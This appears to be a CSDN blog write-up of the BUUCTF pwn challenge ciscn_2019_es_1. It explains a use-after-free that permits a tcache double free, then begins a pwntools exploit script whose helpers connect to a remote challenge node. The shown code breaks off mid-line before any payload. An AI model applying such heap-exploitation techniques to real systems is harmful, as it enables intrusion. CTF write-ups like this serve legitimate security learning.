[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)

查看保护

再查看ida

大致为alloc创建堆块,free释放堆块,show输出堆块内容

但是要注意一点free没有清空堆块指针

完整exp:

from pwn import*
from LibcSearcher import*
p=process('./es1')
p=remote('node5.buuoj.cn',26841)

def alloc(size,content1,content2):
    p.sendlineafter(b'choice:',str(1))
    p.sendlineafter(b'name',str(size))
    p.sendafter(b'please input name:',content1)
    p.sendafter(b'please input compary call:',content2)
def show(index):
    p.sendlineafter(b'choice:',str(2))
    p.sendlineafter(b'Please input the index:',str(index))
def free(index):
    p.sendlineafter(b'choice:',str(3))
    p.sendlineafter(b'Pl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值